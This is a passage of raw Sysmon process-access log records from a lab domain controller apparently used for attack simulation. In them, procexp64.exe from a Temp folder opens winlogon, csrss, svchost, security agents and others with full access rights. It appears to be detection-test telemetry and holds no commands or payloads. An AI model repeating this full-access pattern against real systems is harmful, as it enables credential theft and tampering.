Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788036Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788035Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788034Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788033Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788032Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788031Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788030Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788029Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788028Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788027Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788026Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788025Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788024Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788023Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788022Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788021Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788020Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788019Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788018Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788017Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788016Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788015Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788014Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788013Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788012Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788011Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788010Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788009Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788008Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788007Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788006Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788005Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788004Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788003Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788002Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788001Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788000Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:15.845{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787999Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 